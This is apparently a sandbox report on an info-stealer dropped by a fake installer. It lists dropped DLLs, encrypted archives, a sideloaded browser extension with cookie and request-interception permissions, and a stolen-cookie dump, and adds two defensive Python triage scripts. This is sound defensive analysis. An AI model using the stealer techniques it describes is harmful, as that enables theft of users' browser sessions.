                                                                                                                                          SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                          SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):348160
                                                                                                                                          Entropy (8bit):6.56488891304105
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                          MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                          SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                          SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                          SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):59904
                                                                                                                                          Entropy (8bit):6.753320551944624
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                          MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                          SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                          SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                          SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\ecvAA35.tmp
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x30c654ce, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26738688
                                                                                                                                          Entropy (8bit):1.0373421482715
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:ASwqTaPxuPgNetECnU6A+MSoVkyHlgSFDb7uBi:dgNetHUN3
                                                                                                                                          MD5:7F8F44331D394627C18A394494E644CB
                                                                                                                                          SHA1:AE070B352546456C1059477147D2FB2C8345A724
                                                                                                                                          SHA-256:F9C1458DEA7DAC086832A4AF55F22E4DDCC45F5D3DCB1C1EF8A861FEC6D5A11A
                                                                                                                                          SHA-512:A61A490ABEACA5B0BE7C7C47B43A91E6E361D51D131A136A6F5FB94316C54016EB3D6F5F28534B480C228FBAD7EF16CB20460179C5AA4558A5D663221BC563C6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 0.T.... .......50.......te3....wg.......................)..........x/.*....x..h.+.........................6..43....wI.............................................................................................Z............B.................................................................................................................. ........9...y.......................................................................................................................................................................................................................................~.].9...y.g................qn.1....x..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                          Process:C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                          File Type:;1033
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):237056
                                                                                                                                          Entropy (8bit):6.262405449836627
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                          MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                          SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                          SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                          SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1397922
                                                                                                                                          Entropy (8bit):7.999863097294012
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                          MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                          SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                          SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                          SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):293320
                                                                                                                                          Entropy (8bit):6.347427939821131
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                          MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                          SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                          SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                          SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Web Data1611946694399
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73728
                                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\crx.7z
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):36105
                                                                                                                                          Entropy (8bit):7.994610469125073
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                          MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                          SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                          SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                          SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                          C:\Users\user\AppData\Local\crx.json
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1981
                                                                                                                                          Entropy (8bit):5.365969892012237
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                          MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                          SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                          SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                          SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
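The crx.json record above is a Chromium extension preferences entry, and what makes it worth a second look is the combination of grants it lists: webRequest plus webRequestBlocking, cookies, history and management, scriptable on http://*/* and https://*/*, with from_webstore false and a persistent background page. The following is an added example, not code from the sandbox report or from the sample, that parses such a record and scores it for an analyst. The JSON it runs on is constructed to mirror the fields visible in the preview (same permission list, same host patterns, same manifest shape); the risk annotations, the high-risk API set and the escalation threshold are this example's own assumptions.

```python
"""Triage a Chromium extension preferences record for risky grants.

Added example (not part of the sandbox report). SAMPLE_PREFS is a constructed
record with the same fields as the dropped crx.json; the risk annotations and
the escalation threshold are assumptions made for this example.
"""
import json

# Constructed sample: same shape and permission list as the crx.json preview.
SAMPLE_PREFS = json.dumps({
    "active_permissions": {
        "api": ["activeTab", "browsingData", "contentSettings", "contextMenus",
                "cookies", "downloads", "downloadsInternal", "history",
                "management", "privacy", "storage", "tabs", "topSites",
                "webNavigation", "webRequest", "webRequestBlocking"],
        "scriptable_host": ["http://*/*", "https://*/*"],
    },
    "creation_flags": 1,
    "extension_can_script_all_urls": True,
    "from_bookmark": False,
    "from_webstore": False,
    "location": 1,
    "manifest": {
        "background": {"persistent": True,
                       "scripts": ["jquery-1.8.3.min.js", "background.js"]},
        "browser_action": {"default_title": "book_helper"},
    },
})

# APIs that let an extension read or tamper with every site the user visits (assumed set).
HIGH_RISK_APIS = {
    "cookies": "read/write cookies for any host (session theft)",
    "webRequest": "observe every HTTP(S) request",
    "webRequestBlocking": "synchronously modify, block or redirect requests",
    "history": "read the full browsing history",
    "management": "enumerate/disable other extensions (e.g. ad blockers)",
    "privacy": "change browser privacy settings",
    "browsingData": "wipe browsing data (anti-forensics)",
    "contentSettings": "override per-site content settings",
    "downloads": "start downloads without user interaction",
    "tabs": "read URL and title of every open tab",
}

ALL_URL_PATTERNS = {"<all_urls>", "http://*/*", "https://*/*", "*://*/*"}


def triage_extension_prefs(raw_json: str) -> dict:
    """Return findings and a coarse score for one extension preferences record."""
    prefs = json.loads(raw_json)
    granted = prefs.get("granted_permissions") or prefs.get("active_permissions") or {}
    apis = set(granted.get("api", []))
    hosts = set(granted.get("scriptable_host", []))
    manifest = prefs.get("manifest", {})
    background = manifest.get("background", {})

    findings = []
    risky = sorted(apis & set(HIGH_RISK_APIS))
    for api in risky:
        findings.append(f"api:{api} -> {HIGH_RISK_APIS[api]}")
    all_urls = bool(hosts & ALL_URL_PATTERNS) or bool(prefs.get("extension_can_script_all_urls"))
    if all_urls:
        findings.append("content scripts injectable on all URLs")
    if prefs.get("from_webstore") is False:
        findings.append("not installed from the Web Store (sideloaded, no store review)")
    if background.get("persistent"):
        findings.append("persistent background page (always running)")
    if {"webRequestBlocking", "cookies"} <= apis and all_urls:
        findings.append("man-in-the-browser capable: intercept requests and read cookies on every site")

    score = min(len(findings), 10)      # one point per finding, capped
    return {
        "name": manifest.get("browser_action", {}).get("default_title"),
        "risky_apis": risky,
        "all_urls": all_urls,
        "sideloaded": prefs.get("from_webstore") is False,
        "findings": findings,
        "score": score,
        "escalate": score >= 5,          # assumed escalation threshold
    }


if __name__ == "__main__":
    result = triage_extension_prefs(SAMPLE_PREFS)
    for finding in result["findings"]:
        print("-", finding)
    print("escalate:", result["escalate"])
```

On a live host the same records sit in the browser profile's Preferences or Secure Preferences file under extensions.settings; the function takes one extension's entry at a time.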
                                                                                                                                          C:\Users\user\AppData\Localwebdata1611946694399
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73728
                                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):103632
                                                                                                                                          Entropy (8bit):6.404475911013687
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                          MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                          SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                          SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                          SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\1611946678493.txt
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):27352
                                                                                                                                          Entropy (8bit):3.707285366791018
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkShU:bqg+flvIKpt3VvODNlkShU
                                                                                                                                          MD5:29AEC990E75D33FD9D7A7F25D68D86C3
                                                                                                                                          SHA1:F12FC5D9371E3034E0458AE532EE737B54946F88
                                                                                                                                          SHA-256:58FA8AC358F9A1506750567E99016D4484492624B2595CFF6B6A0F9202F559AD
                                                                                                                                          SHA-512:19F542A7C4BA558FB4E69B2A0AF7F5C85194F4D17A110C2C900C0CE483271343BC6E9A9FB9D66233C0C650A570AC503235D7F462C4F6D86E48F4A8897DFC611A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.
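The 1611946678493.txt file written by the dropped 1611946678493.exe is a cookie export: a UTF-16LE JSON array (BOM, CRLF line ends) whose objects carry Modified Time, Expire Time, Host Name, Path, Name, Value, Secure, HTTP Only, Host Only, Entry ID and Table Name fields, as the preview shows. The following is an added example, not code from the report or the sample, that decodes such a dump and summarises which hosts still have live cookies in it. The sample bytes are constructed with dummy cookie values in the same encoding and layout; the session-cookie name hints and the reference date (taken from the Unix-time-style filenames, late January 2021) are this example's assumptions.

```python
"""Decode a UTF-16 JSON cookie dump of the kind dropped as 1611946678493.txt.

Added example (not part of the sandbox report). SAMPLE_DUMP_BYTES is
constructed with dummy values; SESSION_NAME_HINTS and AS_OF are assumptions.
"""
import json
from collections import defaultdict
from datetime import datetime

# Constructed records with the field names seen in the preview (values are dummies).
_SAMPLE_RECORDS = [
    {"Modified Time": "6/27/2019 10:23:06 AM", "Expire Time": "12/31/2037 10:59:14 PM",
     "Host Name": "google.com", "Path": "/", "Name": "CONSENT", "Value": "dummy-consent",
     "Secure": "No", "HTTP Only": "No", "Host Only": "No", "Entry ID": "1",
     "Table Name": "CookieEntryEx_12"},
    {"Modified Time": "6/27/2019 10:23:11 AM", "Expire Time": "12/27/2019 9:23:11 AM",
     "Host Name": "google.ch", "Path": "/", "Name": "NID", "Value": "dummy-nid",
     "Secure": "No", "HTTP Only": "Yes", "Host Only": "No", "Entry ID": "2",
     "Table Name": "CookieEntryEx_12"},
    {"Modified Time": "1/28/2021 8:00:00 AM", "Expire Time": "1/28/2031 8:00:00 AM",
     "Host Name": ".example.com", "Path": "/", "Name": "SSID", "Value": "dummy-session-token",
     "Secure": "Yes", "HTTP Only": "Yes", "Host Only": "No", "Entry ID": "3",
     "Table Name": "CookieEntryEx_12"},
]
# Same on-disk layout as the dropped file: UTF-16LE with BOM, CRLF-separated JSON.
SAMPLE_DUMP_BYTES = (b"\xff\xfe" +
                     json.dumps(_SAMPLE_RECORDS, indent=0).replace("\n", "\r\n").encode("utf-16-le"))

TIME_FMT = "%m/%d/%Y %I:%M:%S %p"          # format used by the Modified/Expire Time fields
AS_OF = datetime(2021, 1, 29)              # assumed analysis date for the liveness check
SESSION_NAME_HINTS = ("sid", "sess", "auth", "token", "login")   # assumed heuristic


def parse_cookie_dump(data: bytes) -> list:
    """Decode the dump into normalised cookie records (the BOM selects the endianness)."""
    records = json.loads(data.decode("utf-16"))
    out = []
    for r in records:
        out.append({
            "host": r["Host Name"].lstrip("."),
            "name": r["Name"],
            "path": r.get("Path", "/"),
            "value_len": len(r.get("Value", "")),   # keep the length, not the secret itself
            "secure": r.get("Secure") == "Yes",
            "http_only": r.get("HTTP Only") == "Yes",
            "expires": datetime.strptime(r["Expire Time"], TIME_FMT),
            "source_table": r.get("Table Name"),
        })
    return out


def summarize(cookies: list, now: datetime) -> dict:
    """Group still-valid cookies by host and flag names that look like session tokens."""
    live = [c for c in cookies if c["expires"] > now]
    by_host = defaultdict(list)
    for c in live:
        by_host[c["host"]].append(c["name"])
    session_like = [(c["host"], c["name"]) for c in live
                    if any(h in c["name"].lower() for h in SESSION_NAME_HINTS)]
    return {"total": len(cookies), "live": len(live),
            "hosts": dict(by_host), "session_like": session_like}


def summarize_sample() -> dict:
    """Run the pipeline on the constructed dump as of AS_OF."""
    return summarize(parse_cookie_dump(SAMPLE_DUMP_BYTES), AS_OF)


if __name__ == "__main__":
    s = summarize_sample()
    print(f"{s['live']} of {s['total']} cookies still valid as of {AS_OF:%Y-%m-%d}")
    for host, names in s["hosts"].items():
        print(f"  {host}: {', '.join(names)}")
    print("session-like:", s["session_like"])
```

The practical use is scoping: the hosts with live cookies in the dump are the accounts whose sessions should be revoked, and the HTTP Only flag tells you the cookie was taken from disk rather than through the page.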

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.814257274870527
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
